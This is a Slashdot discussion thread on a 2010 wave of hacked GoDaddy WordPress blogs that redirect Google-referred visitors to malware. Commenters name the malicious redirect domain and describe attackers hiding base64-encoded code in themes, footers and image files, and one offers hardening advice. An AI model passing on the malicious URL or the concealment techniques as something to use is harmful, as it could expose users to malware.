Massive Number of GoDaddy WordPress Blogs Hacked 112
A nasty little exploit has hit a large number of GoDaddy-hosted WordPress blogs this weekend. The best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.
Re:I like their commercials (Score:3, Informative)
The redirect leads you to the following URL: http://www2.burnvirusnow34.xorg.pl/ [burnvirusnow34.xorg.pl]
I was redirected to a few 'malwarename'.xorg.pl sites on Saturday when clicking links pointing to wbir.com from CNN. I notified WBIR with several e-mails but they hadn't addressed it as of 11pm last night. CNN pulled the link after 16 hours so I don't know if they just moved on to other stories or acted on the warings I sent.
I wonder if infected sites should be held accountable for PC's that get infected. Luckily I wasn't running Widows so the Setup_422.exe that downladed was harmless.
This weekend, or two weeks ago? (Score:5, Informative)
Only php4 users affected (Score:2, Informative)
Well you're asking for trouble running php4.
It baffles me why people still do it but it also baffles me why people still use Windows. Go figure?
http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/
Network Solutions had a similar thing (Score:4, Informative)
happen about a week ago, though I believe they indicated their FTP accounts had been hacked.
http://blog.networksolutions.com/2010/we-feel-your-pain-and-are-working-hard-to-fix-this/
It was annoying, but I just restored from the prior days backup and went on. I only had one FTP account and a strong password and mine got hit.
We reported this to them on 3/11 (Score:4, Informative)
no mention of google (Score:3, Informative)
This may be referring to the same attack:
http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/ [wpsecuritylock.com]
Alt Link (Score:3, Informative)
Re:Don't put any details in the post or anything.. (Score:2, Informative)
Posting a story on Slashdot is almost as bad as having a botnet DoS a site anyway. No exploit needed, just exploits of the common geek.
Sadly nothing new with Wordpress (Score:4, Informative)
I have been dealing with a large number of Wordpress installs in the past 2 years and I am hear to tell you this is NOTHING new. This is a very common attack that is being used and its hard as shit to find. Sometimes they embed it in Javascript, sometimes its in PHP. Sometimes they encode the PHP or Javascript in base64. Sometimes they have it binary encoded inside image files. They go to great lengths to hide the code.
There is also a large number of free themes out there that come with this crap included. You can typically find it by looking at the footer include file. Look for a large base64 string. Most people ignore those because there are a number of developers who find it amusing to put that crap in their footers that if removed it will prevent the theme from working. Sure, I understand they want to prevent people from removing their credit but come on. Its leading to security issues across the board.
The only thing that I have found that helps limit these attacks is to only make the wp-content/uploads directory writable by the webserver. Everything else is owned by the user or root. To take things further, each install is placed inside a unique directory name that is chmod'd to 701 (its parent is also 701). If an attack manages to crack one install, they can't just attack another by going through the file system.
Not trying to trash Wordpress here, its just too popular and they have had a number of security mistakes in the past. Wordpress installs require a lot of maintenance to keep up to date. Wordpress makes it easy on attackers by listing the version number right in the damn HTML. Sure, they say that it doesn't matter because people can figure it out anyway. But hey, why not just leave your house unlocked at night. Attackers are just going to get in anyway.